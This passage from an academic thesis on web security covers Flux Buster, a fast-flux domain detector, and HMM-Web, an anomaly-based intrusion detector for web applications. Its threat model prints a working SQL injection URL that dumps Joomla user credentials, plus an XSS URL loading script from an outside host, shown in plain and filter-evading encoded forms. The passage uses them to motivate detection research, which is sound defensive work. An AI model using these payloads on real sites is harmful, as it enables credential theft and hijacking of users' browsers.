Furthermore, even if our preltering stage is very conservative, it could be possi-
ble that some ux domain names are erroneously preltered. To this end, a detailed
evaluation is required. For example, we could select ltered domain names whose
patterns are placed near the decision surface of our preltering stage. Then, we may
analyze them using other fast ux detection tools (e.g. [DNSBL]).
More important, due to the massive amount of data Flux Buster has to process,
the responsiveness of Flux Buster is slow. That is, it may require two or three days
before performing a decision about a domain name. However, this limitation may
be reduced by employing the detection approach described in Section 3.4.2.
On the other hand, ux operators may inject some noise in the pool of ux agents
detected by Flux Buster. For example, false positive malicious domain names in g-
ure 3.4.2 were caused by few legitimate IP addresses in our list of ux agents. A
detailed analysis revealed that this was caused by some non-conventional ux do-
main names. These domain names resolved to legitimate IP addresses, pointing to
web services such as search engines (e.g. Google, Virgilio), but also to ux agents,
using a fast ux technique. Of course, this approach is in some way counterproduc-
tive from the ux operator's point of view, since some users may be redirected on
legitimate websites. We speculate that this behavior may be due to some congu-
ration test performed by ux operators. However, in principle, fast ux operators
may deliberately inject some legitimate IP address in the pool of ux agents. They
have to pay some reduced eectiveness of ux domain names, but in such a way
they may aect the reliability of our system.
In order to cope with this issue, we may lter known-as-legitimate IP addresses
from the pool of ux agents, e.g. by extracting all IP addresses used by most popular
websites according to legitimate organizations such as Alexa.
Finally, Flux Buster is not contrapposed to other fast ux network detection
tools employing active approaches. It simply adopts a complementary approach.
Thus, for a more clear view of the fast ux phenomenon, it is necessary to correlate
information from multiple tools, employing dierent approaches and with dierent
input data sources. Also, the output of Flux Buster should be public in order to
benet the security comunity. Unfortunately, due to some privacy issues this is not
(currently) possible. However, we may allow the access to security researchers (visit
the ocial website http://dnsrecon.gtisc.gatech.edu).
Candidate Flux Domains (x104) Query Volume (x109)
3.4.
2 4 6 8 10 1.0 1.1 1.2 1.3 1.4 1.5
1 1
2 2
3 3
4 4
5 5
6 6
7 7
Applications
8 8
9 9
10 10
11 11
12 12
13 13
14 14
15 15
16 16
17 17
18 18
19 19
20 20
21 21
22 22
23 23
24 24
25 25
26 26
27 27
28 28
29 29
30 30
31 31
32 32
33 33
34 34
35 35
36 36
37 37
38 38
39 39
40 40
Figure 3.7: Results of the Data Volume Reduction Process.

41 41
42 42
43 43
44 44
45 45
Sensor 2
Sensor 1
Sensor 2
Sensor 1
49
Figure 3.8: The Flux Buster validation interface, showing a fast ux network identi-
ed by Flux Buster. Through such an interface we may further obtain informations
regarding the detected ux networks as well as validate them and identify the scam
typology they support.
Figure 3.9: The Flux Buster validation interface, showing a legitimate network
identied by Flux Buster. As we can see, multiple domains of the european ntp
pool are grouped together.
Dendrogram
140
80 100
Height
60
40
20
0
d8
d3
d5
d4
d7
d1
d2
d9
d6
Figure 3.10: Example of dendrogram.

US
RU
34.3%
JP 8.1%
4.9%
ES 4.0%
3.5%
RO 3.5%
DE
41.6%
Others
Figure 3.11: Distribution of ux agents (detected by Flux Buster) among dierent
countries.
Analysis of flux domain names through Google safebrowsing

18000
Number of unique fast flux domain names 16000
14000
12000
10000
8000
6000
4000
2000
0 Total Visited Malicious
Figure 3.12: Unique ux domain names detected in the time interval November,
3, 2009 - February, 2, 2010 (blue). Among them, only 629 are related to websites
analyzed (visited) by the Google safebrowsing engine (yellow). Out of all visited
websites employing fast ux technique, 87.3% (529) have been evaluated as malicious
by the Google safebrowsing engine (red).
Analysis of flux domain names through Malwaredomains.com

18000
16000
Number of unique fast flux domain names
14000
12000
10000
8000
6000
4000
2000
0 Total Detected
Figure 3.13: Unique ux domain names detected in the time interval Novem-
ber, 3, 2009 - February, 2, 2010 (blue). Among them, only 715 are noticed by
www.malwaredomains.com.
Figure 3.14: Google safebrowsing's diagnostic page for a fast ux domain name used
for bank phishing purposes.
Figure 3.15: Example of how our malicious ux network detection system can benet
spam ltering.
Figure 3.16: Detection of malicious domains in spam emails.

Chapter 4
Protecting Web Services
Criminals need only nd one open door to get in, whereas
defenders need to protect all the doors.
Unknown
Cyber criminals aim at exploiting the web to their own advantage, without
qualms about the rights of other Internet users. As we have seen in the previous
Section, fast ux networks represent a sophisticated threat for web users. In the case
of ux networks, the attacker is working at server side. On the other hand, miscre-
ants may operate at client-side. They may attack web services, to steal condential
information, or acquire high level privileges on targeted servers, or slow down or
completely disrupt services. These attacks may cause nancial and image damages,
and target users that will further access to these services, for example. Thus, it is
not sucient to enhance client-side web security. In order to enhance web security,
we must also improve the security of web services. This is clear from all recent Inter-
net security reports (see Section 2.3.2). In recent years there has been a lot of eort
to improve the security of web applications. Many international organizations, such
as OWASP foundation and Web Applications Security Consortium are specically
dedicated to enhance the security of web applications. Nevertheless, there is still a
signicant lack of awareness and security training by most of web developers. Also,
the complexity of web services makes server-side security an intrinsically dicult
problem.
Web application rewalls (WAF) represent the state-of-the-art instrument to
block malicious web requests. However, they adopt a rule-based approach that
makes expensive and challenging the protection of web services during the time.
To cope with this problem, we focused our research on anomaly-based approaches
to the detection of server-side web attacks. In this section we present our research
contributions. First, in Section 4.1 we outline the threat model for web services.
In Section 4.2 we summarize related work on the detection of attacks against web
services.
Then, in Section 4.3 we present HMM-Web, an anomaly-based IDS for the detec-
tion of attacks against web applications. HMM-Web may be trained autonomously,
and we will show experimentally that it produces very high detection rate and very
low false positive rate. A key contribution of HMM-Web is its capability of explicitly
58 Chapter 4. Protecting Web Services
handling and detecting attacks (i.e. noise) within its training set. The main limita-
tion of HMM-Web is that it analyzes web server logs. From web server logs we may
not observe some elds of the web requests. For example, web application inputs
sent through a HTTP POST request cannot be analyzed from the web server's log.
Thus we ideated Web Guardian, an anomaly-based IDS which represents the

evolution of HMM-Web. Web Guardian operates with Mod-security, the most pop-
ular open-source Web Application Firewall. As such, it is able to inspect every
eld of the HTTP requests, even if they are carried through an encrypted channel
(HTTPS). Moreover, it may provide for real-time counteractions if suspect web traf-
c is found. Web Guardian, as well as some preliminary experimental evaluation on
its performance, is presented in Section 4.4. We will show that our detection system
may provide advanced protection against either known or unknown attacks against
web servers and web applications.
4.1 Threat model

Miscreants may attack web services at dierent abstraction levels. For example, at
TCP level, they may employ the well-known SYN flooding attack [CERT (1996)].
With an enough number of hosts (e.g. pertaining to a botnet) the SYN ooding
(combined with IP spoong) may switch o (or heavily deteriorate) any Internet
service (Denial of Service attack). Content Delivery Networks (see Section 3.1.1)
make web services more resilient to this kind of attack [Lee et al. (2005)]. However,
due to the nature of the TCP protocol, SYN ooding attacks are very dicult to
address.
In addition, attacks can be carried at HTTP/HTTPS level, i.e. against the web
server. These attacks are typically performed by submitting web requests having
malicious elds. For example, it may be a (unexpected) large value for the message
chunk length, in order to exploit an integer overow vulnerability (chunked encoding
attack) [Mutz et al. (2005)]. In general, a vulnerability in the web server's request
processing may allow the attacker to execute arbitrary instructions, cause a Denial
of Service, bypass Secure Sockets Layer authentication, or include arbitrary HTML
code in the web server's reply (Cross-Site Scripting, XSS) [Apache Vulnerabilities].
Last, but not least, attacks may leverage on web application's vulnerabilities. As
mentioned in Section 2.1, web application attacks constitute the primary threat to
web services. Web applications may be attacked by submitting well-crafted inputs
that exploit input validation or logical aws. Cross Site Scripting and SQL Injection
are the most popular attacks, and leverage on input validation aws [Spett (2002)]
[WASC (2010)].
For example, let us consider a hotel website based on the popular open-source
CMS Joomla and employing the so-called Joomla Hotel Booking System Compo-
nent. Version 1.x of such a component is vulnerable to XSS and SQL Injection
[K-159 (2009)] . In particular, input passed via the h_id and id attributes in the
web application longDesc.php are not properly validated before being used in SQL
4.1. Threat model 59
queries. The Joomla CMS mantains a SQL table jos_users where for each user
there is a row entry. Each row entry has the username and password (encrypted
using the MD5 algorithm) of a Joomla user. For example we may have:
username password
admin 1a1dc91c907325c69271ddf0c944bc72
joe c1572d05424d0ecb2a65ec6a82aeacbf
··· ···
An attacker may obtain these (condential) informations by just retrieving the

following URL:
http://www.vulnerablehotel.com/components/com_hbssearch/longDesc.php?h_id=1&
id=-2%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users
This SQL Injection attack exploits a input validation aw on the attribute id, in
order to execute arbitrary SQL instructions on the back-end MySQL database. The
application longDesc.php will return a page containing usernames and encrypted
passwords of the Joomla users. Then, the attacker may run (oine) an automated
password guessing attack to nd out the passwords (including the admin password).
The administrator access to the booking portal allows the attacker to perform any
kind of manipulation, by just using the CMS.
On the other hand, the attacker may exploit a XSS vulnerabil-

ity in index.php
the application. When option=com_hbssearch and
task=showhoteldetails, input passed via the adult attribute is not prop-
erly validated before being used. This can be exploited to inject arbitrary
HTML code in the page generated by the web application. For example, if a
user clicks on the following link (e.g. because he trusts www.vulnerablehotel.com):
http://www.vulnerablehotel.com/index.php?option=com_hbssearch
&task=showhoteldetails&id=118&adult=2<script src=http://www.dbrgf.ru/script.js>
the red code will be included in the HTML page generated by index.php.
This allows an attacker to run arbitrary Javascript code (retrieved from
http://www.dbrgf.ru/script.js) on the user's browser. For example, malicious
code may be hosted through a fast ux network (e.g. www.dbrgf.ru is a fast ux do-
main name). The malicious code may exploit client-side vulnerabilities, stole user's
cookies or any other condential information in the context of the aected site.
A number of tags other than <script> </script> may be used to inject

Javascript code and evade lters and WAF [Hansen (2009)]. Also a number of
obfuscation techniques may be used to hide malicious code from users. For example
the previous XSS attack may be rewritten using ASCII encoding:
http://www.vulnerablehotel.com/index.php?option=com_hbssearch
&task=showhoteldetails&id=118&adult=2%3C%73%63%72%69%70%74%20%73%72%63%3D
%68%74%74%70%3A%2F%2F%77%77%77%2E%64%62%72%67%66%2E%72%75%2F%73%63%72%69
%70%74%2E%6A%73%3E
Similarly, wide range of advanced techniques for evading WAF are available for SQL
Injection [Mac Vittie (2007)] [L0t3k].
From such an example, it seems easy to avoid XSS and SQL Injection vulnera-
bilities. On the other hand, we should assess that h_id and adult attributes receive
only integer values. Nevertheless, in general this may be not an easy task. The
key point is that web applications (such as those used by Joomla) may be high in
number and they may be very complex (i.e. perform complex operations). Web
applications may handle many inputs, and it is necessary to take into account all
possible input combinations and exceptions. This is not straightforward, and unfor-
tunately, most web developers demonstrate a lack of security training to cope with
most common software aws. Also, web applications are often developed under
strict time constraints.
Currently deployed security solutions typically rely on Web Application Fire-

walls (WAF, e.g. ModSecurity [Modsecurity]), which lter application inputs us-
ing a predened set of rules, and signature-based Intrusion Detection Systems
1
(e.g. [PHP IDS] [Snort] ), which detect attacks using a set of (known) attack sig-
natures. Unfortunately, these systems can be evaded modifying known attacks or
exploiting new vulnerabilities [Vigna et al. (2005)]. Furthermore, since web appli-
cations pregure specic inputs, conguring WAF to lter out malicious input is
expensive. WAF rules must be updated as soon as web application inputs change
or new applications are added. All these considerations motivate our work.
4.2 Detecting attacks against web services

Early work on anomaly-based detection of attacks against web services, as
well as other network services, relied mostly on the analysis of network trac
(network-based) [Wang et al. (2004), Lippman et al. (2000)]. In the last years, a
more specic (host-based) analysis have been proposed [Kruegel et al. (2005) (a),
Ingham et al. (2007)], by analysing web server logs.
In [Kruegel et al. (2005) (a)], the authors proposed a multi model framework
for the detection of attacks against web applications. They modelled (legitimate)
queries using both spatial features (related to a single request), and temporal fea-
tures (related to multiple consecutive requests). Dierent models to represent these
features were applied, being the HMM the more powerful of them. In particular,
they codied web application queries by extracting the sequence of attributes, and
1
Actually Snort may also employ an anomaly-based preprocessor, i.e. Statistical Packet
Anomaly Detection Engine (SPADE). However, it is not specically developed to detect web ap-
plication attacks. Instead it looks for anomalies in some statistic features of the network trac.
4.2. Detecting attacks against web services 61
for each attribute, its input, codied as a sequence of characters. HMM have been
used to model attribute inputs without taking into account typical semantic dier-
ences between classes of characters (alphabetic, numeric, non-alphanumeric), which
usually determine their meaning. Moreover, the authors denitely did not exploit
the powerful of such a model, because they rounded every non-zero probability value
to one. Finally, the training set was assumed without attacks, by ltering it with a
signature based IDS, in order to throw out at least known attacks.
In [Robertson et al. (2006)], the authors adopt an anomaly detection approach
very similar to [Kruegel et al. (2005) (a)]. However, they also group anomalies ac-
cording to their typology and infer the associated attack class according to a set of
heuristics based on known attack patterns. This is a very interesting approach, for
two main reasons. First, grouping anomalies having similar features, we may group
together false alarms and thus it should be easier for a security administrator to
cope with a relatively high amount of false alarms. Second, anomaly-based systems
typically provide poor information about the type of attack that is associated with
an anomaly. Thus, it is interesting to automatically infer the attack class to which
an anomaly is associated.
In [Bolzoni and Etalle (2008)] the authors propose to subdivide web applica-
tion inputs in two classes regular and irregular. Depending on the class, they
apply a dierent machine learning approach to the modeling their legitimate val-
ues. In particular regular inputs are automatically modeled using regular expres-
sions, whereas irregular ones are modeled using a simpler approach (based on a
previously developed anomaly-based IDS). This is justied, since dierent inputs
may have very dierent variability. For example, the attribute id in the exam-
ple of Section 4.1, should receive only integer values. Contrary, some other at-
tributes may receive very variable inputs. As an example, this is the case of
the attribute q in the web application employed by the google search engine (i.e.
http:www.google.com/search?q=searchkey ). It receives the search key, that may
contain any character. Similarly to [Kruegel et al. (2005) (a)], the main limitation
of the approach is that it is not able to cope with noise in the training set. Authors
in [Bolzoni and Etalle (2008)] collect the training set from production web servers
and throw out known attacks employing a signature-based IDS and through manual
inspection. However, in general this may not be sucient, and training set noise
may signicantly aect the modeling of legitimate inputs [Cretu et al. (2008)].
In [Ezeife et al. (2008)] malicious HTTP requests are detected using a mixture
of legitimate trac models and high-level signatures for web attacks. High-level
signatures are dened in a priori fashion, on the basis of typical attack patterns.
For example, the presence of the < and > on web application inputs may indicate
XSS attacks, whereas the quote character ' may indicate a SQL Injection attack.
Furthermore, legitimate web applications inputs are described using simple models,
built using a sample of real HTTP trac on the web server. They model the
set of attributes and the length of their values. An anomaly score is increased
whenever a high-level signature matches the current request (or multiple requests),
or web application inputs do not match the model of legitimate inputs. If this
score exceeds a predened threshold, an anomaly is raised. Data is extracted from

both network and host (web server's logs) sources. This is interesting since the
authors correlate both input and output trac on the web server and analyze web
application inputs submitted through POST requests. However, it must be veried
how much the approach in [Ezeife et al. (2008)] is robust to evading attacks, since
it relies on very simple models. For example, an attacker may evade known XSS
signatures by employing ASCII encoding. Also, the attacker may limit the length of
malicious XSS code so that it is recognized as legitimate (i.e. so that the anomaly
score is under threshold) by the detector (see Section 4.1).
In [Guyet et al. (2009)] a self-adaptive web intrusion detection system is pre-

sented. They adopt a multi-agent approach inspired by the Dempster-Shafer (DS)
theory of evidence [Shafer (1986)]. In particular, for each request, they extract the
URI's character distribution, a sequence of tokens
2 which compose the URI, and
the ratio between successful and unsuccessful requests performed by the source IP
address of the request. They employ a labeled training set containing legitimate
HTTP trac from production web servers and (injected) known attacks, in order
to bootstrap the models of agents. Then, agents are able to self-adapt their models
by analyzing new requests. The approach is interesting and authors showed that
self-adaptation may allow detecting and modeling new attack instances. However,
authors experimented with generic attacks, i.e. known attacks against web servers
and applications. Such generic attacks are easy to evidence, since they typically
fail. For example, they may target web applications which are not installed on the
web server, or other types of web servers. Contrary, web application attacks are
tuned according to the specic application inputs in order to be eective. Thus, it
must be veried the actual performance of the approach in [Guyet et al. (2009)].
The paper [Torrano et al. (2009)] proposes an anomaly-based WAF. The authors
store the denition of legitimate requests in a XML le. In particular, the XML
le describes legitimate values for request method, headers, and allowed paths for
request URIs. Also, for each web application attribute, the XML le describes (a)
the set of allowed non alphanumeric characters, and the maximum and minimum
allowed (b) input length, (c) number of digits, (d) number of letters, (e) number of
non-alphanumeric characters. This approach is simple and very eective in detecting
web application attacks that leverage on input validation aws. However, a key
problem of the approach is that the legitimate prole inference requires a clean
training set. Unfortunally, in a real environment, such a training set is very hard
to obtain. In addition, a problem is to take into account equivalent URIs. This
may cause false positives, since the same resource may be identied by multiple
URIs (see for example mod_rewrite of the Apache web server), but only a small
portion of them may be present in the training set, and thus recognized as legitimate.
Moreover, this system is not able to inspect HTTPS, since acts in a way similar to
HTTP proxies (i.e. the typical protocol used for web services managing sensitive
information).
2
Each token is a string comprised between two meta-charaters within the set: [/, ?, =, &]
4.2. Detecting attacks against web services 63
In [Krueger et al. (2010)] a reverse HTTP proxy is proposed to face malicious

web requests. HTTP request elds are parsed and stored as token-value pairs. In
particular, Request URI (e.g. the web application path), and each web application
attribute, are considered as separate tokens. Each token is analyzed by an anomaly
detector and if a suspect value is found, an healing action is performed. For example,
the value can be removed, replaced or encoded, in order to defeat a possible attack.
Anomaly detectors can be trained in a semi-automated fashion and may cope with
noise (i.e. attacks) in training data. The weak point of the approach proposed in
[Krueger et al. (2010)] is that the web application path and its attributes are ana-
lyzed independently each other. Thus, the relationship between web application and
its inputs is not taken into account. That is, the same attribute name may poten-
tially be used by multiple web applications, and it may receive completely dierent
values. Input values that may be legitimate for a web application, may be anoma-
lous (and potentially harm) to other applications and vice-versa. Furthermore, it
may be hard to correctly tune healing actions for each token, in order to not aect
legitimate requests. Similarly to the work [Torrano et al. (2009)], this approach is
not able to monitor HTTPS trac.
4.2.0.1 Our contribution
HMM-Web From an operational point of view, the context of HMM-

Web [Corona et al. (2009)] is the same as [Kruegel et al. (2005) (a),
Ingham et al. (2007)]. In particular, we compare our approach with respect
to that in [Kruegel et al. (2005) (a)], which is the most similar work. HMM-Web is
trained in an unsupervised way, by processing web application queries as logged by
the web server (training set). Such an approach relies on the assumption that the
great majority of web application queries in the training set is legitimate. This is a
reasonable assumption because the typical web user accesses services as expected.
With HMM-Web we exploit the powerful of Hidden Markov Models to detect

simple as well as sophisticated attacks against web applications. We experiment with
real trac extracted from production web servers. To the best of our knowledge,
HMM-Web is the rst work which explicitly handle the noise in the training set,
where the noise is made up of web attacks. This is important, because, as we
will see, real trac cannot be assumed noiseless. Due to the ad-hoc nature of
web applications, automatic ltering methods based on signature-based IDS are not
eective, and manual inspection is not feasible in practice. Our system not only is
able to eectively model the legitimate trac, but also to detect attacks that are
similar to the noise in the training set. To this end, we optimise IDS parameters
on the basis of the fraction of non-legitimate queries we expect in the training set.
Experimental results show that even a raw estimate for this parameter can eectively
enhance the detection rate, with a small amount of false positives.
Another contribution of HMM-Web is the codication of the input sequence

analysed by HMM. Many works in the security area simplify the intrusion detec-
tion problem by training classiers on raw data, skipping some known semantics of
data. On the other hand, we explicitly codify queries to light out the most relevant
semantic aspects of their structure. This operation substantially leads to better
IDS performances and to a complexity reduction of the learning task for HMM.
Finally, HMM-Web propose a novel way, based on the a-priori knowledge of

this intrusion detection problem, to correlate HMM, relying on the Multiple Clas-
sier System (MCS) paradigm [Kuncheva (2004)]. Recent studies showed exper-
imentally that the MCS paradigm can outperform single classier systems, be-
ing an MCS more dicult to evade and able to reduce the false positive rate
[Perdisci et al. (2006) (b)].
Web Guardian Counteractions against server-side web attacks should be per-

formed in real time, as soon as an intrusion attempt is detected. This because,
once the attacker has found a vulnerable web service, he may exploit it in a matter
of seconds. Furthermore, some web applications having well-known vulnerabilities
(see the example in Section 4.1) may be compromised automatically by a software
(ro)bot. To cope with this problem, recent work such as [Torrano et al. (2009)] and
[Krueger et al. (2010)] proposed the combination of anomaly-based detection and
automated counteractions.
Analogously, we studied and developed Web Guardian, an anomaly-based IDS

which may provide for real-time counteractions. Web guardian applies a novel mech-
anism for protecting web services. It is strictly coupled with [Modsecurity], one
the world's most popular open-source Web Application Firewalls. In such a way,
it substantially complements the rule-based approach of Modsecurity .
3 Contrary
to previous work, [Torrano et al. (2009)] [Krueger et al. (2010)], Web Guardian is
able to inspect any eld of the web requests, even if they are carried through an
encrypted channel (i.e. HTTPS trac). If an anomaly is found, depending on the
anomaly type, a specic counteraction is performed. Counteractions may be dened
according to the reliability of an anomaly type, so that the probability of aecting
legitimate trac is minimum.
Similarly to HMM-Web, Web Guardian is able to infer the normal prole of web
requests without supervision, explicitly coping with the presence of noise (attacks)
in the training set. Moreover, Web Guardian is a multi-model detection system.
This architecture may allow to infer the attack type from the raised anomalies.
This is important to provide more informative security reports, with respect to
state-of-the-art anomaly detection systems. The idea is similar to those proposed
in [Robertson et al. (2006)] and [Bolzoni et al. (2009)].
4.3 HMM-Web
Our aim is detecting both simple and sophisticated attacks against each web ap-
plication that resides on a web server. Focusing on this goal, the IDS is composed
3
That is, Web Guardian provides an additional protection against unknown attacks (or attacks
for which Modsecurity rules are not available).
4.3. HMM-Web 65
by a set of (independent) application-specic modules. Each module, composed

by multiple HMM ensembles, is trained using queries on a specic web application
and, during the operational phase, outputs a probability value for each query on
this web application. Furthermore, a decision module classies the query as sus-
picious (a possible attack) or legitimate, applying a threshold to this probability
value. Thresholds are xed independently for each application-specic module.
The following sections provide details about (a) the feature extraction process,
(b) the application-specic modules, (c) decision module and (d) the building of
HMM ensembles. Throughout these sections we will refer to g. 4.1, where it is
showed the IDS processing for a search.php application, which could be used to
list publications of a certain category (cat attribute), containing a key-word (key
attribute). It may be nally useful to remark that in some works the term web
application is used to identify the a set of executables/scripts that oers a certain
number of services (e.g. a search engine: main page, database interrogation, images
generation). For the sake of clarity, in the following we will refer to each program
or script which generate dynamic web contents, as a dierent web application.
4.3.1 Feature extraction
Web application queries are extracted from web server logs. In particular, we select
all requests where the method is GET and that receive a successful response (status
code 2xx, as described in [RFC 2616 (1999)]). Then, the web application and its
input query are obtained from the Uniform Resource Identier (URI), by considering
the web server conguration and its URI parsing routine.
For a generic query, the sequence of attributes and, for each attribute, its in-
put string, are extracted. Regarding the sequence of attributes, we consider each
attribute as a symbol of the sequence, as it is enough to detect anomalies either in
the order or in the presence of suspicious attributes. On the other hand, it is useful
to provide for a more complex codication of attribute inputs w.r.t. the simple
extraction of the character sequence. By scrutinising attacks against web applica-
tions [CVE], it is evident that, typically, non-alphanumeric characters have higher
relevance than alphanumeric characters when interpreting the meaning of attribute
inputs. Non-alphanumeric characters could be used as meta-characters, with a spe-
cial meaning, during the processing made by web applications. Thus, a distinction
between them (e.g. between / and -) is denitely necessary. On the contrary
distinguishing between digits or between alphabetic letters is not useful to detect
input validation attacks. Consequently, we substitute every digit with the symbol N
and every letter with the symbol A, while all the other characters remain the same.
For example, the attribute value /dir/sub/1,2 becomes /AAA/AAA/N,N. The
obtained sequence of symbols is then processed by HMM.
4.3.2 Application-specic modules

As shown in g. 4.1, each application-specic module consists of: (1) an HMM
ensemble which analyse the sequence of attributes (i.e. {cat, key}); (2) for each
attribute found in training queries, an HMM ensemble which analyses the input
sequence for that attribute (i.e. for cat, {N, N}, for key, {A, A, A})4 . Thus, each
HMM ensemble models a dierent feature of the web application query. Our goal
is to detect an anomaly in any of these features of the query, because they can be
related to a dierent attack typology. To this end, we apply the minimum rule
between the HMM ensemble outputs.
4.3.3 Decision module

For the aim of the following discussion, let us dene for a specic training set:
• M the number of web applications.
• q(wi ) the set of queries for the i-th web application wi , ∀i ∈ [1, M ]. |q(wi )| is
the number of queries for wi .
∑M
• N= j=1 |q(wj )| is the total number of queries collected.
The decision module classies a query as suspicious if its probability is under a

threshold, otherwise, the query is classied as legitimate.
Now, it is important to note that, for a certain web application, the basic as-
sumption that a considerable amount of its training queries is legitimate may not be
valid. The attacker may exploit web applications which are rarely interrogated by
users, to perform some unauthorised action. For example, this is the case of appli-
cations for testing/conguration purposes ([milw0rm], exploits: 6287, 6314, 6269,
5955). If such a kind of attacks are inside the training set, in the worst case, we
model only instances of attack queries (instead that legitimate queries) for the web
applications involved.
To cope with this problem we consider the relative frequencies of queries toward
each web application f req(wi ) = |q(wi )|/N . This frequency reects in some way
how strong is the assumption that its queries are actually legitimate. The higher this
frequency, the stronger the assumption that its queries are actually legitimate. In
the detection phase, the frequency f req(wi ) represents an estimate of the probability
of (a query on) the web application wi and it is stored in a look-up table (g. 4.1).
If we expect an overall fraction of attack queries α in the training set, it will be
equal to:
1 ∑
M
α= αi · |q(wi )| (4.1)
N
i=1
where αi is the fraction of suspicious training queries toward wi . The simplest

solution may be αi = α, that is, an equal fraction α of training queries is classied
4
Braces and commas are not part of the sequence, we use them just to represent it.
4.3. HMM-Web 67
as suspicious by each application-specic module. However, this setting does not

take into account how strong is the assumption that training queries are really
legitimate.
Aiming at including this information, for each application-specic module S(wi ),

we x a threshold ti so that the value of αi is in inverse proportion with respect to
f req(wi ). In this case, in agreement with eq. 4.1, αi are given by
α
αi = ∀i ∈ [1, M ] (4.2)
M · f req(wi )
It is easy to see that, with such a setting, the smaller the frequency of a web
application, the larger the fraction of training queries classied as suspicious. In
other terms, the weaker the assumption that web application queries are legitimate,
the bigger the fraction of training queries classied as suspicious.
Thus, the α parameter is used to estimate the threshold ti to be used in the

detection phase, as α can be considered as an overall condence factor for the
legitimacy of training queries.
4.3.4 HMM building

We address only two out of the three basic problems for HMM: the Learning Problem
(during the training phase) and the Evaluation Problem during the detection phase.
We use the well-known Baum-Welch algorithm to train HMM [Rabiner (1989)]. As
the algorithm may nd only a local minima of the likelihood function (that is, the
HMM models well only a subset of training sequences) we use an ensemble of HMM
in order to better model the whole training set. Moreover, HMM performance de-
pend on parameters as number of states, initial state, symbol emission matrix, state
transition matrix. As the estimation of the best suited values of such HMM param-
eters is more art than science, the use of an ensemble of HMM can counterbalance
this lack of knowledge.
We set an equal number of states for each HMM inside an ensemble. This
number is equal to the average length of training sequences, rounded to the nearest
greater integer. Also, an eective length denition is used; the length of a sequence
is given by the number of dierent symbols in this sequence. For example, in the
sequence {a, b, c, b, c} there are 3 dierent symbols, a, b and c. Consequently 3 is
the eective length for this sequence. In consequence of the heuristics we used to
x the number of states, each state can be associated to an element of the analyzed
sequence, rather than a particular state of the web application.
Both the state transition and the symbol emission matrices are randomly ini-
tialised. Considering IDS performance, this choice seems to be reasonable. In fact,
our IDS consists of a large number of HMM, and using the a priori knowledge of
the problem to model the structure of matrices could be a time and eort expensive
task. Finally, we build the dictionary of symbols by extracting them from training
sequences. HMM in the same ensemble use the same dictionary.
Attack Type Exploit N. Paper N.

6512, 6510, 6502, 6490, 16, 174, 202,
SQL Injection
6469, 6467,
6465, 6449, 6336, 3490, 215
5507
2776, 2881, 2987, 3405,

XSS 162, 173, 192
3490, 4681,
4989, 6332
Table 4.1: Working exploits and some papers used as reference for our attacks inside
dataset A. Either exploits or papers can be looked up in the web site [milw0rm],
respectively, on exploits or papers sections.
4.3.5 Fusion of HMM outputs

In principle, the best fusion rule for HMM inside an ensemble is unknown. However,
it may be useful to refer to a theoretical analysis of HMM outputs. Given an input
sequence s, the output of the i-th HMM mi (out of K HMM) in the ensemble can
be written as p(s|mi ) = p(mi |s) · p(s)/p(mi ).
We could set the same a priori probability for all models, that is, p(mi ) =
c, ∀i ∈ [1, K]. This can be a reasonable assumption as in principle all models
are equally valid. It is easy to see that, when using the maximum fusion rule
(output=max{p(s|mi ), i ∈ [1, K]}), the output is proportional to max{p(mi |s), i ∈
[1, K]} (the term p(s) is a constant). So, using the maximum rule, we may select the
model in the ensemble that best describes the analyzed sequence to compute the
probability of the sequence. This reasoning is in agreement with the original goal
of an HMM ensemble, that is, to exploit the diversity of multiple HMM to better
modelling the whole set of training sequences.
4.3.6 Experiments
4.3.6.1 Dataset and performance evaluation
In order to test our IDS in a realistic scenario, we collected a data set of queries from
a production web server of our Academic Institution. Let us call D this dataset. It
consists of more than 150,000 queries collected in a period of six months. Queries are
distributed over a total of 52 web applications. In particular, 24 of these applications
provide services for registered users, the remaining 28 provide public services. As
D consists of a set of real requests from a web server log les, it may contain both
normal and attack queries. Our rst goal is to assess IDS performance in terms
of false alarm rate and detection of attacks similar to those which may be inside
the training queries. To this end, each query inside D has been labelled as attack
or legitimate, through a semiautomatic process, further described in sec. 4.3.6.1.
Furthermore, D has been split randomly into 5 parts (all containing the same number
of queries) in order to apply a 5-fold cross-validation. As we are dealing with real
4.3. HMM-Web 69
trac each split of D will contain unknown attacks and, in consequence of the
random sampling, we assume the percentage of attacks being the same in all of ve
splits. Exploiting the labelling process, we evaluated both the false positive (FPR)
and the detection rate (DR) on D.
In order to evaluate the detection rate, we selected a set of attacks published
on [milw0rm] and used these as a basis to build a dataset (called A) of attacks
exploiting specic vulnerabilities on our set of applications. This dataset consists of
19 SQL Injection and 19 Cross-site Scripting (XSS) attacks, on a subset of 18 web
applications (see table 4.3.6.1).
It is worth to note that, due to privacy issues and the problem formulation,
public data sets are not available. Anyway, there are attacks as those referred in
[Ingham et al. (2007)] that are related to known vulnerabilities of widely deployed
and open-source web applications. On the other hand, in practice, web applications
which manage critical information (i.e. public administration, home banking) are
typically highly customised and their source code is not public. This reect also
our case, and it is the reason why attacks inside A are just derived from well know
attacks, representing a version of them customised against applications in our set.
Attack queries inside dataset D In order to distinguish between attacks and

legitimate queries in the training set we exploit the IDS itself. As attack queries
are typically in low number w.r.t. legitimate queries, and their structure is typically
dierent (this is denitely evident from the working exploits in table 4.3.6.1), we
expect that they will receive lower probability than legitimate queries. In fact our
experiments fully conrmed this behaviour. However, it may not be possible to fully
automate the labelling process without fall into error, i.e. simply because data set
D does not contain enough information to do that.
Thus, for each web application wi having a relatively high number of queries, we
identied (and labelled) attack queries inside the training set by manually inspecting
queries which receive the lowest probability. For web applications having a relatively
low amount of queries, we inspected all training queries, because an attack query
could not receive lower probability than a legitimate query (i.e. the majority of
queries are attacks), as discussed in sec. 4.3. Spotting attack queries inside D, we
exploited additional information.
We assessed legitimate inputs by links contained inside web pages, when brows-
ing as a typical user. Moreover, evidencing attack queries, we exploited our expertise
regarding typical attacks and perhaps the corresponding output generated by web
applications. In such a way, for each application wi we computed the corresponding
∗
fraction of attacks αi inside D.
∑M
Using such a method, we found an overall fraction of α∗ = ∗
i=0 αi = 0.995%
of attacks inside D. These attacks were very similar and were mainly related to the
injection of HTML code.
In addition, the graphics on gure 4.2 conrm our intuition that the the lower
the number of queries, the more weak is the assumption that they are legitimate. In
fact, we observe that as the number of queries toward a certain application decreases,
the percentage of attacks between them tend to increase (about 10% of attacks for
the 9th application).
4.3.7 Results
In this section we summarise experimental results when (1) a single HMM and (2)
multiple HMM are used to model a generic sequence. Our IDS has been always able
to detect all attacks inside dataset A, so in the following we will focus our analysis
